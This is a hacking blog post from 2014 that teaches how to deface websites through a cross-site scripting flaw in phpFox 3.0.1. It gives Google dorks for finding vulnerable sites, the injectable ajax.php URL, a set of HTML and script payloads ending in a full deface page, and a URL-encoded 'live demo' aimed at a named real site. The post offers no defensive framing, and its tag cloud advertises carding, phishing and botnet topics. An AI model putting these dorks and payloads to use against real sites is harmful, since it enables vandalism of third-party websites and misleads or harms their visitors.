Archive Pages Design$type=blogging

phpFox XSS Vulnerability

Finding Vulnerable Target Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1." "inurl:/stat...





Finding Vulnerable Target
Dork:
"intext:© · English (US) Powered By phpFox Version 3.0.1."
"inurl:/static/ajax.php?core"

1- Choose any dork and paste on Google

2- Choose any site


Exploiting Target

1- So, your site would be like this or something similar,

www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc

2- Now, change the error message with your HTML tags or anything you want.

To show Header
<h1>Hacked</h1>


To show header in center
<center><h1>Hacked by Joker Hydra</h1></center>


To show Title
<title>Hacked</title>

To Add a Image
<img src="http://www.jokeranondarkknight.blogspot.com'><img src="https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png"/>


To add a Message
<p><b>Your Message Here<b></p>


To write message in next lines
<p><b>First line<br>Second Line <b></p>


To add a scrolling Text
<marquee>Scrolling text Here</marquee>


To Add a alert box
<script>alert("HACKED!");</script>


To add background colour in page
<body bgcolor="red"/>


To Add a full deface Page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>Hacked By Joker Hydra!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href='http://www.jokeranondarkknight.blogspot.com'><marquee><img src="https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png"/></marquee>



3- So it would be like this,

http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EHACKED%20By%20Joker%20Hydra!%3C/h2%3E%3Cbr%3E%3Ch1%3EJoker%20Hydra%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.jokeranondarkknight.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png%22/%3E%3C/marquee%3E


Live Demo:

http://artisticdimeinc.com/static/ajax.php?core%5Bajax%5D=true&core%5Bcall%5D=core.message&core%5Bsecurity_token%5D=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=+%3Ctitle%3EHacked%21%3C%2Ftitle%3E%3Cbody+bgcolor%3Dblack%3E%3Ccenter%3E%3Cfont+color%3D%22white%22%3E%3Ch2%3EHACKED+By+Joker+Hydra%21%3C%2Fh2%3E%3Cbr%3E%3Ch1%3EJoker+Hydra+W4S+H3RE%3C%2Fh1%3E%3Ca+href%3D%27http%3A%2F%2Fwww.jokeranondarkknight.blogspot.com%27%3E%3Cmarquee%3E%3Cimg+src%3D%22https%3A%2F%2Flh4.googleusercontent.com%2F-1PbCaCavdVs%2FUzUN2ok8ySI%2FAAAAAAAAAJs%2FzynaD1MHSGE%2Fw346-h260%2FGreyHat.png%22%2F%3E%3C%2Fmarquee%3E

COMMENTS

Tên

.htaccess #OPISIS 000WebHost HACKED 18+ 4rum Addons Affliates AIO Sofware Android Anti AV Anti DDos Anti Dos Anti SQLi Anti Virus App ASCII Art ASP Attack Auto AutoGame AutoIT backdoor BackTrack Bin Checker Bind Bitcoin Blog Tricks Boot Botnet Brute Bug Bypass C C# C++ Carder Cash Out CCN CCV CD CEH CF Charset check Check PayPal Checker Tools CHMOD Clone Scripts Cloudflare Code Code Web Codecanyon Coding Collation UTF-8 Command Cookie Cpanel cPanel Tools Crack Crack Tools Cracker Cracking Credit Card Cross site CSRF CSS Data DDos Decode Decrypter DeepWeb Deface DNS DNS Hijacking Domain Dork Dork SQL Dork Vulnerability Dos Dos-Deflate Drop DropBox Ebook Ebooks Email Email Spam Emal Encode Encryption error Exploit Exploit - Vulnerability Facebook Fake Page File Inclusion File Injections Filter Firewall Fix lỗi Flash Flood Footprinting Freezer FTP Funny Game Games Gift Card Girls Giveaway Gmail Google Hack Google Proxy Grabber Hack Facebook Hack Game Hack password Hack Shop Hack Wifi Hacker Hackig Hacking HackNet Hash Hijacking Hosting HTML HTML5 ICANN ID Card IFrame Injection Attacks Injection iOS IP IRC IT Java Joomla JS Kali Kali Linux Kaoli Linux KAV Keylogger KIS LAN LFI Linux Local Attack Mã hoá Maintaining Access Make Money Malware Metasploit Method MITM MMO MyBB MySQL NEWBIE News NginX Nmap NNLT Operating System Operation Oracle Other PageRank Parser PayPal Pentest Perl phần mềm Phishing Phone Photoshop PHP PHP Script Ping Web Plugin Profile Program Programmer Proxy PTC pts Pumper Python RATS Remote Remote Desktop reverse engineering RFI Roboo Scam Scam Page Scan Scan Vps Scanner Tools Scource Scoure Search Security Sell SEO Serial Key Sever Share Code Shell Shipper Shipping Shipping TUT Skype Sniff Social Networking Socks Socks Proxy Source Spam Spaw Spoofer Spy SQL SQL ASPX SQL Basic SQLi SQLMap SSH SSL SSLstrip Tạo Website Test Theme - Wallpaper Thủ thuật Thủ thuật Facebook thủ thuật máy tính thủ thuật web ToolKit Tools Tools Hack Tools Pack Tricks Trojan TUT TUT UG TUTORIAL Ubuntu UG Up shell vBulletin Virus visual basic.net VPN VPS VPS Free Vulnerability WAF Warez Warning Webdav Website Website hữu ích Widget Wifi Win 7 Win 8 Win 8.1 Windows Wireless Wireshark Wordlist WordPress Worm WPA Key Xâm nhập máy tính Xenforo XHTML XSHM XSS Zipcode
false
ltr
item
Joker™ Blog: phpFox XSS Vulnerability
phpFox XSS Vulnerability
http://2.bp.blogspot.com/-1ZW-FfybyvU/U6WOQe00wlI/AAAAAAAAAgw/TKzN57Og1cY/s1600/Untitled.png
http://2.bp.blogspot.com/-1ZW-FfybyvU/U6WOQe00wlI/AAAAAAAAAgw/TKzN57Og1cY/s72-c/Untitled.png
Joker™ Blog
https://jdkgreyhat.blogspot.com/2014/06/phpfox-xss-vulnerability.html
https://jdkgreyhat.blogspot.com/
http://jdkgreyhat.blogspot.com/
http://jdkgreyhat.blogspot.com/2014/06/phpfox-xss-vulnerability.html
true
6952006105369371103
UTF-8
Not found any posts VIEW ALL Read More Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago